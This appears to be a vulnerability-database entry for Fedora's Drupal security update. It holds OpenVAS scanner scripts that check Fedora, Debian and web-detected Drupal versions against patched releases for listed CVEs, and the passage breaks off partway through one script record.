ID FEDORA:45D79604B015 Type fedora Reporter Fedora Modified 2018-05-10T19:11:07
Description
Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure.
{"openvas": [{"lastseen": "2019-05-29T18:32:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2018-7602", "CVE-2017-6929", "CVE-2017-6922", "CVE-2017-6927", "CVE-2017-6928"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-05-12T00:00:00", "id": "OPENVAS:1361412562310874428", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874428", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-2359c2ae0e", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_2359c2ae0e_drupal7_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-2359c2ae0e\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874428\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 06:06:46 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-7600\", \"CVE-2017-6927\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\", \"CVE-2017-6922\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-2359c2ae0e\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-2359c2ae0e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6MFVJWW3I4N6VEV7R3N23SPQMTUAXVS5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.59~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2018-7602", "CVE-2017-6929", "CVE-2017-6927", "CVE-2017-6928"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-05-12T00:00:00", "id": "OPENVAS:1361412562310874421", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874421", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-b9ad458866", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_b9ad458866_drupal7_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-b9ad458866\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874421\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 05:59:21 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-7600\", \"CVE-2017-6927\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-b9ad458866\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-b9ad458866\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GYT7R43FLLEEG4N2QS3FDGZ3NNHOL3HL\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.59~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:56:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6932", "CVE-2017-6929", "CVE-2017-6927", "CVE-2017-6928"], "description": "Multiple vulnerabilities have been found in the Drupal content management\nframework.", "modified": "2019-07-04T00:00:00", "published": "2018-02-24T00:00:00", "id": "OPENVAS:1361412562310704123", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704123", "type": "openvas", "title": "Debian Security Advisory DSA 4123-1 (drupal7 - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4123-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704123\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2017-6927\", \"CVE-2017-6928\", \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_name(\"Debian Security Advisory DSA 4123-1 (drupal7 - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-02-24 00:00:00 +0100 (Sat, 24 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4123.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(8|9)\");\n script_tag(name:\"affected\", value:\"drupal7 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u10.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u2.\n\nWe recommend that you upgrade your drupal7 packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/drupal7\");\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities have been found in the Drupal content management\nframework.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.32-1+deb8u10\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.52-2+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-01-29T20:12:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6932", "CVE-2017-6929", "CVE-2017-6927", "CVE-2017-6928"], "description": "Multiple vulnerabilities have been found in the Drupal content\nmanagement framework.s", "modified": "2020-01-29T00:00:00", "published": "2018-03-27T00:00:00", "id": "OPENVAS:1361412562310891295", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891295", "type": "openvas", "title": "Debian LTS: Security Advisory for drupal7 (DLA-1295-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891295\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-6927\", \"CVE-2017-6928\", \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_name(\"Debian LTS: Security Advisory for drupal7 (DLA-1295-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-03-27 00:00:00 +0200 (Tue, 27 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/02/msg00030.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"drupal7 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u17.\n\nWe recommend that you upgrade your drupal7 packages.\");\n\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities have been found in the Drupal content\nmanagement framework.s\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u17\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:33:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6929", "CVE-2017-6930", "CVE-2017-6927", "CVE-2017-6928"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-04-25T00:00:00", "id": "OPENVAS:1361412562310874382", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874382", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-6e6d8c314b", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_6e6d8c314b_drupal8_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-6e6d8c314b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874382\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 08:51:05 +0200 (Wed, 25 Apr 2018)\");\n script_cve_id(\"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\",\n \"CVE-2017-6931\", \"CVE-2017-6928\", \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-6e6d8c314b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-6e6d8c314b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XWSND764JDPO7QHXKOFVZCECOMLR3N6L\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.6~3.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6932", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6929", "CVE-2017-6930", "CVE-2017-6927", "CVE-2017-6928"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-04-11T00:00:00", "id": "OPENVAS:1361412562310874358", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874358", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-d8269e4262", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_d8269e4262_drupal7_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-d8269e4262\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874358\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-11 15:28:12 +0200 (Wed, 11 Apr 2018)\");\n script_cve_id(\"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6928\", \"CVE-2017-6929\",\n \"CVE-2017-6930\", \"CVE-2017-6931\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-d8269e4262\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-d8269e4262\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I4N63W35VZ32IRMETFSYB5PQOWCWARYH\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.58~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6932", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6929", "CVE-2017-6930", "CVE-2017-6927", "CVE-2017-6928"], "description": "This host is running Drupal and is prone\n to multiple vulnerabilities.", "modified": "2018-10-23T00:00:00", "published": "2018-02-22T00:00:00", "id": "OPENVAS:1361412562310812775", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812775", "type": "openvas", "title": "Drupal Core Multiple Vulnerabilities (SA-CORE-2018-001) (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_mult_vuln_SA-CORE-2018-001_win.nasl 12023 2018-10-23 05:37:04Z cfischer $\n#\n# Drupal Core Multiple Vulnerabilities (SA-CORE-2018-001) (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812775\");\n script_version(\"$Revision: 12023 $\");\n script_cve_id(\"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6930\", \"CVE-2017-6931\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-23 07:37:04 +0200 (Tue, 23 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-22 10:43:18 +0530 (Thu, 22 Feb 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Drupal Core Multiple Vulnerabilities (SA-CORE-2018-001) (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is running Drupal and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An improper access restriction for sensitive contents via 'Comment reply form'.\n\n - 'Drupal.checkPlain' JavaScript function does not correctly handle all methods\n of injecting malicious HTML.\n\n - Private file access check fails under certain conditions in which one module\n is trying to grant access to the file and another is trying to deny it.\n\n - A jQuery cross site scripting vulnerability is present when making Ajax\n requests to untrusted domains.\n\n - Language fallback can be incorrect on multilingual sites with node access\n restrictions.\n\n - An error in 'Settings Tray module'.\n\n - An external link injection vulnerability when the language switcher block\n is used.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to trick users into unwillingly navigating to an external site,\n update certain data that they do not have the permissions for, execute\n arbitrary script and gain extra privileges.\");\n\n script_tag(name:\"affected\", value:\"Drupal core version 8.x versions prior to\n 8.4.5 and 7.x versions prior to 7.57 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Drupal core version 8.4.5 or\n 7.57 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-001\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_windows\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!drupalPort = get_app_port(cpe:CPE)) {\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:drupalPort, version_regex:\"^[0-9]\\.[0-9]+)\", exit_no_version:TRUE)) {\n exit(0);\n}\n\ndrupalVer = infos['version'];\npath = infos['location'];\n\nif(drupalVer =~ \"^(8\\.)\" && version_is_less(version:drupalVer, test_version:\"8.4.5\")) {\n fix = \"8.4.5\";\n}\n\nif(drupalVer =~ \"^(7\\.)\" && version_is_less(version:drupalVer, test_version:\"7.57\")) {\n fix = \"7.57\";\n}\n\nif(fix) {\n report = report_fixed_ver(installed_version:drupalVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:drupalPort);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6932", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6929", "CVE-2017-6930", "CVE-2017-6927", "CVE-2017-6928"], "description": "This host is running Drupal and is prone\n to multiple vulnerabilities.", "modified": "2018-10-22T00:00:00", "published": "2018-02-22T00:00:00", "id": "OPENVAS:1361412562310812776", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812776", "type": "openvas", "title": "Drupal Core Multiple Vulnerabilities (SA-CORE-2018-001) (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_mult_vuln_SA-CORE-2018-001_lin.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Multiple Vulnerabilities (SA-CORE-2018-001) (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812776\");\n script_version(\"$Revision: 12012 $\");\n script_cve_id(\"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6930\", \"CVE-2017-6931\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) 